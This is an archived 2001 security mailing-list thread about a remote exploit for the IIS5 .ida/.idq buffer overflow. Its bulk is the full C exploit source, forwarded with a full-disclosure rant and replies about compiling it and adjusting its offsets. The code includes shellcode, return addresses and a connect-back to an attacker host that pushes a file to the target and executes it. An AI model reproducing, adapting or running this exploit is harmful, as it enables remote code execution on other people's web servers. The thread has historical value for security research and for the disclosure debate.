RE: [Fwd: Re: FWD: Re: .ida vulnerability..]

From: Marc Maiffret (marcat_private)
Date: Sat Jul 07 2001 - 00:36:31 PDT

  • Next message: Brian O'Berry: "Re: fingerprinting a windows ftpd"

    the offsets of the exploit are set for the Japanese version of nt. you'll
    have to tweak them by hand to the u.s. locations (which there can be a few
    depending on dll versions etc...)
    
    it works though... just got to massage it a bit.
    
    Signed,
    Marc Maiffret
    Chief Hacking Officer
    eEye Digital Security
    T.949.349.9062
    F.949.349.9538
    http://eEye.com/Retina - Network Security Scanner
    http://eEye.com/Iris - Network Traffic Analyzer
    http://eEye.com/SecureIIS - Web Application Firewall
    
    | -----Original Message-----
    | From: bluefur0r bluefur0r [mailto:bluefur0rat_private]
    | Sent: Thursday, July 05, 2001 10:45 AM
    | To: ph08usat_private
    | Cc: pen-testat_private; cdownsat_private
    | Subject: Re: [Fwd: Re: FWD: Re: .ida vulnerability..]
    |
    |
    | I tried this on my IIS5 machine and it did a wonderful job of
    | spiking inetinfo.exe to 99% cpu util. I tried sending ncx99.exe
    | and well no port shell on 99 was granted. =( boohoo!
    | blue
    | Op Wed,  4 Jul 2001 04:55:09 -0400 PhoBus <ph08usat_private>
    | geschreven:
    | >>From my analysis of the code, the program fork()s itself and
    | one process sends the shellcode to the target while another
    | listens on port 80 for connections.  When the target connects
    | back, it sends the <file> to the remote system which is then executed.
    | >
    | >I have not been able to get the code to work (i.e. the server
    | does not connect back).  Anyone has had success testing it so far?
    | >
    | >
    | >-------- Original Message --------
    | >Subject: Re: FWD: Re: .ida vulnerability..
    | >From: cdowns <cdownsat_private>
    | >To: pen-testat_private
    | >
    | >well got it compiled with no problem but what the hell does <file> do ?
    | >tried to overwrite a file in a writeable directory and then tried to
    | >create a file in a writable directory ? hmmmmm something im not seeing
    | >here ? thanks
    | >
    | >-D
    | >
    | >Marc Maiffret wrote:
    | >
    | >> This came across Steve's win2ksec mailing list almost a week or so ago.
    | >> Not sure why none of the securityfocus mailing lists have picked it up
    | >> (at least to my knowledge). Working remote IIS exploit for the .ida
    | >> hole. Figured since you guys have had a discussion about writing a
    | >> exploit for it etc... this might be helpful to you.
    | >>
    | >> Signed,
    | >> Marc Maiffret
    | >> Chief Hacking Officer
    | >> eEye Digital Security
    | >> T.949.349.9062
    | >> F.949.349.9538
    | >> http://eEye.com/Retina - Network Security Scanner
    | >> http://eEye.com/Iris - Network Traffic Analyzer
    | >> http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities
    | >>
    | >> ||> ----- Original Message -----
    | >> ||> From: "Steve" <steveat_private>
    | >> ||> To: <win2ksecadviceat_private>
    | >> ||> Sent: Wednesday, June 27, 2001 2:57 PM
    | >> ||> Subject: Fwd: Full Disclosure .ida exploit.
    | >> ||>
    | >> ||>
    | >> ||> > This was sent to me a few minutes ago.  Here is the code as
    | >> posted to ||> Packet Storm and a rant by the person who brought it to
    | >> my attention. ||While
    | >> ||> I normally have tried to keep rants off of the mailing list, I
    | >> ||have always
    | >> ||> been very pro full disclosure and will do my best to defend it.
    | >> Please ||> note, I have not verified this code to be functioning but
    | >> will make an ||> attempt to later this evening.  If anyone else has
    | >> time (Ken?  Mark?) ||please
    | >> ||> do so and post to the list.
    | >> ||> >
    | >> ||> > -Steve
    | >> ||> >
    | >> ||> > /*
    | >> ||> >  IIS5.0 .idq overrun remote exploit
    | >> ||> >  Programmed by hsj  : 01.06.21
    | >> ||> >
    | >> ||> >  code flow:
    | >> ||> >   overrun -> jmp or call ebx -> jmp 8 ->
    | >> ||> >   check shellcode addr and jump to there ->
    | >> ||> >   shellcode -> make back channel -> download & exec code
    | >> ||> > */
    | >> ||> > #include <stdio.h>
    | >> ||> > #include <stdlib.h>
    | >> ||> > #include <string.h>
    | >> ||> > #include <signal.h>
    | >> ||> > #include <sys/types.h>
    | >> ||> > #include <sys/socket.h>
    | >> ||> > #include <sys/ioctl.h>
    | >> ||> > #include <sys/time.h>
    | >> ||> > #include <sys/wait.h>
    | >> ||> > #include <errno.h>
    | >> ||> > #include <unistd.h>
    | >> ||> > #include <fcntl.h>
    | >> ||> > #include <netinet/in.h>
    | >> ||> > #include <limits.h>
    | >> ||> > #include <netdb.h>
    | >> ||> > #include <arpa/inet.h>
    | >> ||> >
    | >> ||> > #define RET                 0x77e516de  /* jmp or call ebx */ ||>
    | >> > #define GMHANDLEA           0x77e56c42  /* Address of
    | >> GetModuleHandleA ||*/
    | >> ||> > #define GPADDRESS           0x77e59ac1  /* Address of
    | >> |GetProcAddress */
    | >> ||> > #define GMHANDLEA_OFFSET    24
    | >> ||> > #define GPADDRESS_OFFSET    61
    | >> ||> > #define OFFSET              234         /* exception handler
    | >> offset */ ||> > #define NOP                 0x41
    | >> ||> >
    | >> ||> > #define MASKING             1
    | >> ||> > #if MASKING
    | >> ||> > #define PORTMASK            0x4141
    | >> ||> > #define ADDRMASK            0x41414141
    | >> ||> > #define PORTMASK_OFFSET     128
    | >> ||> > #define ADDRMASK_OFFSET     133
    | >> ||> > #endif
    | >> ||> >
    | >> ||> > #define PORT                80
    | >> ||> > #define ADDR                "attacker.mydomain.co.jp"
    | >> ||> > #define PORT_OFFSET         115
    | >> ||> > #define ADDR_OFFSET         120
    | >> ||> > unsigned char shellcode[]=
    | >> ||> >
    | >> "\x5B\x33\xC0\x40\x40\xC1\xE0\x09\x2B\xE0\x33\xC9\x41\x41\x33\xC0" ||>
    | >> > "\x51\x53\x83\xC3\x06\x88\x03\xB8\xDD\xCC\xBB\xAA\xFF\xD0\x59\x50"
    | >> ||> >
    | >> "\x43\xE2\xEB\x33\xED\x8B\xF3\x5F\x33\xC0\x80\x3B\x2E\x75\x1E\x88" ||>
    | >> > "\x03\x83\xFD\x04\x75\x04\x8B\x7C\x24\x10\x56\x57\xB8\xDD\xCC\xBB"
    | >> ||> >
    | >> "\xAA\xFF\xD0\x50\x8D\x73\x01\x45\x83\xFD\x08\x74\x03\x43\xEB\xD8" ||>
    | >> > "\x8D\x74\x24\x20\x33\xC0\x50\x40\x50\x40\x50\x8B\x46\xFC\xFF\xD0"
    | >> ||> >
    | >> "\x8B\xF8\x33\xC0\x40\x40\x66\x89\x06\xC1\xE0\x03\x50\x56\x57\x66" ||>
    | >> > "\xC7\x46\x02\xBB\xAA\xC7\x46\x04\x44\x33\x22\x11"
    | >> ||> > #if MASKING
    | >> ||> > "\x66\x81\x76\x02\x41\x41\x81\x76\x04\x41\x41\x41\x41"
    | >> ||> > #endif
    | >> ||> > "\x8B\x46\xF8\xFF\xD0\x33\xC0"
    | >> ||> >
    | >> "\xC7\x06\x5C\x61\x61\x2E\xC7\x46\x04\x65\x78\x65\x41\x88\x46\x07" ||>
    | >> > "\x66\xB8\x80\x01\x50\x66\xB8\x01\x81\x50\x56\x8B\x46\xEC\xFF\xD0"
    | >> ||> >
    | >> "\x8B\xD8\x33\xC0\x50\x40\xC1\xE0\x09\x50\x8D\x4E\x08\x51\x57\x8B" ||>
    | >> > "\x46\xF4\xFF\xD0\x85\xC0\x7E\x0E\x50\x8D\x4E\x08\x51\x53\x8B\x46"
    | >> ||> >
    | >> "\xE8\xFF\xD0\x90\xEB\xDC\x53\x8B\x46\xE4\xFF\xD0\x57\x8B\x46\xF0" ||>
    | >> > "\xFF\xD0\x33\xC0\x50\x56\x56\x8B\x46\xE0\xFF\xD0\x33\xC0\xFF\xD0";
    | >> ||> >
    | >> ||> > unsigned char storage[]=
    | >> ||> > "\xEB\x02"
    | >> ||> > "\xEB\x4E"
    | >> ||> > "\xE8\xF9\xFF\xFF\xFF"
    | >> ||> > "msvcrt.ws2_32.socket.connect.recv.closesocket."
    | >> ||> > "_open._write._close._execl.";
    | >> ||> >
    | >> ||> > unsigned char forwardjump[]=
    | >> ||> > "%u08eb";
    | >> ||> >
    | >> ||> > unsigned char jump_to_shell[]=
    | >> ||> > "%uC033%uB866%u031F%u0340%u8BD8%u8B03"
    | >> ||> > "%u6840%uDB33%u30B3%uC303%uE0FF";
    | >> ||> >
    | >> ||> > unsigned int resolve(char *name)
    | >> ||> > {
    | >> ||> >     struct hostent *he;
    | >> ||> >     unsigned int ip;
    | >> ||> >
    | >> ||> >     if((ip=inet_addr(name))==(-1))
    | >> ||> >     {
    | >> ||> >         if((he=gethostbyname(name))==0)
    | >> ||> >             return 0;
    | >> ||> >         memcpy(&ip,he->h_addr,4);
    | >> ||> >     }
    | >> ||> >     return ip;
    | >> ||> > }
    | >> ||> >
    | >> ||> > int make_connection(char *address,int port)
    | >> ||> > {
    | >> ||> >     struct sockaddr_in server,target;
    | >> ||> >     int s,i,bf;
    | >> ||> >     fd_set wd;
    | >> ||> >     struct timeval tv;
    | >> ||> >
    | >> ||> >     s = socket(AF_INET,SOCK_STREAM,0);
    | >> ||> >     if(s<0)
    | >> ||> >         return -1;
    | >> ||> >     memset((char *)&server,0,sizeof(server));
    | >> ||> >     server.sin_family = AF_INET;
    | >> ||> >     server.sin_addr.s_addr = htonl(INADDR_ANY);
    | >> ||> >     server.sin_port = 0;
    | >> ||> >
    | >> ||> >     target.sin_family = AF_INET;
    | >> ||> >     target.sin_addr.s_addr = resolve(address);
    | >> ||> >     if(target.sin_addr.s_addr==0)
    | >> ||> >     {
    | >> ||> >         close(s);
    | >> ||> >         return -2;
    | >> ||> >     }
    | >> ||> >     target.sin_port = htons(port);
    | >> ||> >     bf = 1;
    | >> ||> >     ioctl(s,FIONBIO,&bf);
    | >> ||> >     tv.tv_sec = 10;
    | >> ||> >     tv.tv_usec = 0;
    | >> ||> >     FD_ZERO(&wd);
    | >> ||> >     FD_SET(s,&wd);
    | >> ||> >     connect(s,(struct sockaddr *)&target,sizeof(target));
    | >> ||> >     if((i=select(s+1,0,&wd,0,&tv))==(-1))
    | >> ||> >     {
    | >> ||> >         close(s);
    | >> ||> >         return -3;
    | >> ||> >     }
    | >> ||> >     if(i==0)
    | >> ||> >     {
    | >> ||> >         close(s);
    | >> ||> >         return -4;
    | >> ||> >     }
    | >> ||> >     i = sizeof(int);
    | >> ||> >     getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
    | >> ||> >     if((bf!=0)||(i!=sizeof(int)))
    | >> ||> >     {
    | >> ||> >         close(s);
    | >> ||> >         errno = bf;
    | >> ||> >         return -5;
    | >> ||> >     }
    | >> ||> >     ioctl(s,FIONBIO,&bf);
    | >> ||> >     return s;
    | >> ||> > }
    | >> ||> >
    | >> ||> > int get_connection(int port)
    | >> ||> > {
    | >> ||> >     struct sockaddr_in local,remote;
    | >> ||> >     int lsock,csock,len,reuse_addr;
    | >> ||> >
    | >> ||> >     lsock = socket(AF_INET,SOCK_STREAM,0);
    | >> ||> >     if(lsock<0)
    | >> ||> >     {
    | >> ||> >         perror("socket");
    | >> ||> >         exit(1);
    | >> ||> >     }
    | >> ||> >     reuse_addr = 1;
    | >> ||> >     if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char
    | >> ||> *)&reuse_addr,sizeof(reuse_addr))<0)
    | >> ||> >     {
    | >> ||> >         perror("setsockopt");
    | >> ||> >         close(lsock);
    | >> ||> >         exit(1);
    | >> ||> >     }
    | >> ||> >     memset((char *)&local,0,sizeof(local));
    | >> ||> >     local.sin_family = AF_INET;
    | >> ||> >     local.sin_port = htons(port);
    | >> ||> >     local.sin_addr.s_addr = htonl(INADDR_ANY);
    | >> ||> >     if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0) ||>
    | >> >     {
    | >> ||> >         perror("bind");
    | >> ||> >         close(lsock);
    | >> ||> >         exit(1);
    | >> ||> >     }
    | >> ||> >     if(listen(lsock,1)<0)
    | >> ||> >     {
    | >> ||> >         perror("listen");
    | >> ||> >         close(lsock);
    | >> ||> >         exit(1);
    | >> ||> >     }
    | >> ||> > retry:
    | >> ||> >     len = sizeof(remote);
    | >> ||> >     csock = accept(lsock,(struct sockaddr *)&remote,&len); ||> >
    | >>    if(csock<0)
    | >> ||> >     {
    | >> ||> >         if(errno!=EINTR)
    | >> ||> >         {
    | >> ||> >             perror("accept");
    | >> ||> >             close(lsock);
    | >> ||> >             exit(1);
    | >> ||> >         }
    | >> ||> >         else
    | >> ||> >             goto retry;
    | >> ||> >     }
    | >> ||> >     close(lsock);
    | >> ||> >     return csock;
    | >> ||> > }
    | >> ||> >
    | >> ||> > int main(int argc,char *argv[])
    | >> ||> > {
    | >> ||> >     int i,j,s,pid;
    | >> ||> >     unsigned int cb;
    | >> ||> >     unsigned short port;
    | >> ||> >     char *p,buf[512],buf2[512],buf3[2048];
    | >> ||> >     FILE *fp;
    | >> ||> >
    | >> ||> >     if(argc!=3)
    | >> ||> >     {
    | >> ||> >         printf("usage: $ %s ip file\n",argv[0]);
    | >> ||> >         return -1;
    | >> ||> >     }
    | >> ||> >     if((fp=fopen(argv[2],"rb"))==0)
    | >> ||> >         return -2;
    | >> ||> >
    | >> ||> >     if(!(cb=resolve(ADDR)))
    | >> ||> >         return -3;
    | >> ||> >
    | >> ||> >     if((pid=fork())<0)
    | >> ||> >         return -4;
    | >> ||> >
    | >> ||> >     if(pid)
    | >> ||> >     {
    | >> ||> >         fclose(fp);
    | >> ||> >         s = make_connection(argv[1],80);
    | >> ||> >         if(s<0)
    | >> ||> >         {
    | >> ||> >             printf("connect error:[%d].\n",s);
    | >> ||> >             kill(pid,SIGTERM);
    | >> ||> >             return -5;
    | >> ||> >         }
    | >> ||> >
    | >> ||> >         j = strlen(shellcode);
    | >> ||> >         *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] =
    | >> GMHANDLEA; ||> >         *(unsigned int *)&shellcode[GPADDRESS_OFFSET]
    | >> = GPADDRESS; ||> >         port = htons(PORT);
    | >> ||> > #if MASKING
    | >> ||> >         port ^= PORTMASK;
    | >> ||> >         cb ^= ADDRMASK;
    | >> ||> >         *(unsigned short *)&shellcode[PORTMASK_OFFSET] =
    | >> PORTMASK; ||> >         *(unsigned int *)&shellcode[ADDRMASK_OFFSET] =
    | >> ADDRMASK; ||> > #endif
    | >> ||> >         *(unsigned short *)&shellcode[PORT_OFFSET] = port; ||> >
    | >>        *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;
    | >> ||> >         for(i=0;i<strlen(shellcode);i++)
    | >> ||> >         {
    | >> ||> >             if((shellcode[i]==0x0a)||
    | >> ||> >                (shellcode[i]==0x0d)||
    | >> ||> >                (shellcode[i]==0x3a))
    | >> ||> >                 break;
    | >> ||> >         }
    | >> ||> >         if(i!=j)
    | >> ||> >         {
    | >> ||> >             printf("bad portno or ip address...\n");
    | >> ||> >             close(s);
    | >> ||> >             kill(pid,SIGTERM);
    | >> ||> >             return -6;
    | >> ||> >         }
    | >> ||> >
    | >> ||> >         memset(buf,1,sizeof(buf));
    | >> ||> >         p = &buf[OFFSET-2];
    | >> ||> >         sprintf(p,"%s",forwardjump);
    | >> ||> >         p += strlen(forwardjump);
    | >> ||> >         *p++ = 1;
    | >> ||> >         *p++ = '%';
    | >> ||> >         *p++ = 'u';
    | >> ||> >         sprintf(p,"%04x",(RET>>0)&0xffff);
    | >> ||> >         p += 4;
    | >> ||> >         *p++ = '%';
    | >> ||> >         *p++ = 'u';
    | >> ||> >         sprintf(p,"%04x",(RET>>16)&0xffff);
    | >> ||> >         p += 4;
    | >> ||> >         *p++ = 1;
    | >> ||> >         sprintf(p,"%s",jump_to_shell);
    | >> ||> >
    | >> ||> >         memset(buf2,NOP,sizeof(buf2));
    | >> ||> >
    | >> ||>
    | >> ||memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],stor
    | >> ||age,strle
    | >> ||> n(storage));
    | >> ||> >
    | >> ||>
    | >> ||memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(she
    | >> ||llcode));
    | >> ||> >         buf2[sizeof(buf2)-1] = 0;
    | >> ||> >
    | >> ||> >         sprintf(buf3,"GET /a.idq?%s=a HTTP/1.0\r\nShell:
    | >> ||> %s\r\n\r\n",buf,buf2);
    | >> ||> >         write(s,buf3,strlen(buf3));
    | >> ||> >
    | >> ||> >         printf("---");
    | >> ||> >         for(i=0;i<strlen(buf3);i++)
    | >> ||> >         {
    | >> ||> >             if((i%16)==0)
    | >> ||> >                 printf("\n");
    | >> ||> >             printf("%02X ",buf3[i]&0xff);
    | >> ||> >         }
    | >> ||> >         printf("\n---\n");
    | >> ||> >
    | >> ||> >         wait(0);
    | >> ||> >         sleep(1);
    | >> ||> >         shutdown(s,2);
    | >> ||> >         close(s);
    | >> ||> >
    | >> ||> >         printf("Done.\n");
    | >> ||> >     }
    | >> ||> >     else
    | >> ||> >     {
    | >> ||> >         s = get_connection(PORT);
    | >> ||> >         j = 0;
    | >> ||> >         while((i=fread(buf,1,sizeof(buf),fp)))
    | >> ||> >         {
    | >> ||> >             write(s,buf,i);
    | >> ||> >             j += i;
    | >> ||> >             printf(".");
    | >> ||> >             fflush(stdout);
    | >> ||> >         }
    | >> ||> >         fclose(fp);
    | >> ||> >         printf("\n%d bytes send...\n",j);
    | >> ||> >
    | >> ||> >         shutdown(s,2);
    | >> ||> >         close(s);
    | >> ||> >     }
    | >> ||> >
    | >> ||> >     return 0;
    | >> ||> > }
    | >> ||> >
    | >> ||> >
    | >> ||> >
    | >> ||> >
    | >> ||> > >From: fuq69rcat_private
    | >> ||> > >Date: Wed, 27 Jun 2001 13:17:57 -0800 (PDT)
    | >> ||> > >To: steveat_private
    | >> ||> > >Subject: Full Disclosure .ida exploit.
    | >> ||> > >
    | >> ||> > >Steve I hope you let this through you your win2k mailing list. I
    | >> know ||its
    | >> ||> > >a bit of a rant but I think it needs to be said and also the
    | >> |fact that
    | >> ||> there
    | >> ||> > >is a link to the .ida exploit should be worth while enough.
    | >> Thanks. ||> > >-----
    | >> ||> > >Isn't it strange that a gift can be an enemy? That a
    | >> ||privilege can be a
    | >> ||> > >chore. Maybe its just me but security is going nowhere fast
    | >> because ||> everyone
    | >> ||> > >is to busy looking at the ten thousand foot view instead of
    | >> getting ||down,
    | >> ||> > > getting their hands dirty, and fixing the problem at its core.
    | >> ||> > >
    | >> ||> > >I see everyone trying to run around and figure out what to do
    | >> ||about the
    | >> ||> > >hax0rs and the script kiddies. Bureaucrats and has never
    | >> |been security
    | >> ||> experts
    | >> ||> > >are all looking to form organizations that they hope will cut
    | >> down on ||the
    | >> ||> > >"threat" of vulnerability exposure, when thats not the real
    | >> problem. ||> Software
    | >> ||> > >companies writing insecure software IS the problem.
    | >> ||> > >
    | >> ||> > >Who gets shit on in the end? The hackers and researchers
    | >> |putting their
    | >> ||> own
    | >> ||> > >time into finding vulnerabilities in software thats been
    | >> developed by ||> multi-
    | >> ||> > >billion dollar software companies. These same hackers and
    | >> researchers ||who
    | >> ||> > >have done all of this work for FREE, to help the security
    | >> community. ||They
    | >> ||> > >end up being the ones that get shit on for releasing this
    | >> information ||to
    | >> ||> > >the masses so that they might help educate people about security
    | >> ||> vulnerabilities
    | >> ||> > >and keep software companies on their toes and honest about ||the
    | >> security
    | >> ||> > >issues that affect their software.
    | >> ||> > >
    | >> ||> > >Most software companies do not take security seriously,
    | >> regardless of ||> what
    | >> ||> > >they say, because the bean counters at most software companies
    | >> never ||see
    | >> ||> > >an ROI (Return on Investment) for adding much needed security
    | >> ||mechanisms
    | >> ||> > >to their security software. Why not? because honestly not
    | >> ||enough people
    | >> ||> > >are standing up and demanding for a change. Instead the majority
    | >> of ||> administrators,
    | >> ||> > > NT at least, tend to just laugh and say, for example, "Ahh haha
    | >> ||another
    | >> ||> > >MS hole, what's new" and then proceed to shrug it off, stay
    | >> |bent over,
    | >> ||> and
    | >> ||> > >keep taking it from software companies.
    | >> ||> > >
    | >> ||> > >Also for those administrators that actually do care about
    | >> security ||you'll
    | >> ||> > >tend to find that a lot of them are actually paranoid about
    | >> |installing
    | >> ||> security
    | >> ||> > >patches from companies like Microsoft because they've had a
    | >> |really bad
    | >> ||> track
    | >> ||> > >record on creating patches that end up breaking and then need
    | >> patches ||> themselves.
    | >> ||> > >So the administrators end up waiting for the next service pack
    | >> (which ||> leaves
    | >> ||> > >them vulnerable), UNLESS they have a full disclosure example
    | >> exploit ||that
    | >> ||> > >first hand shows them how serious the vulnerability is, at
    | >> |which point
    | >> ||I
    | >> ||> > >promise you they WILL install the patch.
    | >> ||> > >
    | >> ||> > >I could go on forever about the circles the security industry is
    | >> ||running
    | >> ||> > >in or how 80% of the "security experts" have never done ANYTHING
    | >> to ||help
    | >> ||> > >security (hi russ!!) besides spout off their mouth about topics
    | >> they ||> usually
    | >> ||> > >have never really experienced first hand.
    | >> ||> > >
    | >> ||> > >A handful of people, like Russ Cooper, have said that when
    | >> people ||release
    | >> ||> > >non-malicious example exploits that it makes it easier for
    | >> people to ||take
    | >> ||> > >those exploits and tweak them into doing bad things. That is
    | >> ||completely
    | >> ||> > >inaccurate and its a statement being made by someone who
    | >> |wouldn't know
    | >> ||> what
    | >> ||> > >an exploit was if shellcode slapped him in the face.
    | >> ||> > >
    | >> ||> > >I came across this the other day on packetstorm. Working .ida
    | >> exploit ||> which
    | >> ||> > >is probably one of the first publicly released, although as
    | >> ||always when
    | >> ||> > >any big hole is released and you don't see exploits on
    | >> |Bugtraq or what
    | >> ||> not
    | >> ||> > >that MEANS thats because people aren't sharing their exploits
    | >> with ||> everyone
    | >> ||> > >but they are out there and most likely being used.
    | >> ||> > >
    | >> ||> >
    | >> ||>
    | >> ||>http://209.143.242.119/cgi-bin/cbmc/forums.cgi?authkey=anonymous&u
    | >> ||name=anon
    | >> ||> ymous&datopic=General&mesgcheck=defined&gum=3087&editoron=
    | >> ||> > >
    | >> ||> > >There is a whole other world out there that few people can even
    | >> begin ||to
    | >> ||> > >understand. Exploits are created daily for all types of
    | >> ||vulnerabilities
    | >> ||> > >that people might have a use for. Just because you dont see it
    | >> on the ||> handful
    | >> ||> > >of security mailing lists, or because CERT, NIPC, or Russ Cooper
    | >> have ||not
    | >> ||> > >heard about it does not mean it is not there.
    | >> ||> > >
    | >> ||> > >All those opposed to full disclosure, be damned. For to resist
    | >> is to ||piss
    | >> ||> > >against the wind and all who do will end up smelling.
    | >> ||> > >Free, encrypted, secure Web-based email at www.hushmail.com ||>
    | >> >
    | >> ||> >
    | >> _____________________________________________________________________
    | >> ||> > ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
    | >> ||> > ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice
    | >> DIGEST" ||> > SEND ALL COMMANDS TO: listservat_private
    | >> ||> >
    | >> ||>
    | >> ||>
    | >> ||
    | >> ||
    | >
    | >--
    | >------------------------------
    | >    Christopher M Downs
    | >Network Security Administrator
    | >   Skillsoft Corporation
    | >    cdownsat_private
    | >"Micro$oft typed backwards
    | >      spells "c:\duh /?"
    | >------------------------------
    | >
    | >
    | >
    | >
    | >-----------------------------------------------------------------
    | -----------
    | >----------
    | >
    | >This list is provided by the SecurityFocus Security Intelligence Alert
    | >(SIA) Service For more information on SecurityFocus' SIA service which
    | >automatically alerts you to  the latest security vulnerabilities please
    | >see:
    | >
    | >https://alerts.securityfocus.com/
    | >
    | >
    | >--
    | >Gerry Chng      | Subtlety is the art of saying
    | >mailat_private | what you think and getting out
    | >                | of the way before it is understood
    | >
    | >
    | >
    | >
    | >
    | >_________________________________________________________
    | >Get your own FREE evilemail.com Email account at...
    | >http://www.evilemail.com
    | >
    | >EvilEmail.com - Free email for the living and the dead.
    | >_________________________________________________________
    | >
    | >
    | >
    | >-----------------------------------------------------------------
    | ---------------------
    | >
    | >This list is provided by the SecurityFocus Security Intelligence
    | Alert (SIA) Service
    | >For more information on SecurityFocus' SIA service which
    | automatically alerts you to
    | >the latest security vulnerabilities please see:
    | >
    | >https://alerts.securityfocus.com/
    | >
    | >
    |
    | =================================================================
    | Kies een origineel e-mailadres op www.emails.nl
    |
    | ------------------------------------------------------------------
    | --------------------
    |
    | This list is provided by the SecurityFocus Security Intelligence
    | Alert (SIA) Service
    | For more information on SecurityFocus' SIA service which
    | automatically alerts you to
    | the latest security vulnerabilities please see:
    |
    | https://alerts.securityfocus.com/
    |
    |
    
    
    --------------------------------------------------------------------------------------
    
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service
    For more information on SecurityFocus' SIA service which automatically alerts you to 
    the latest security vulnerabilities please see:
    
    https://alerts.securityfocus.com/
    



    This archive was generated by hypermail 2b30 : Sat Jul 07 2001 - 10:08:44 PDT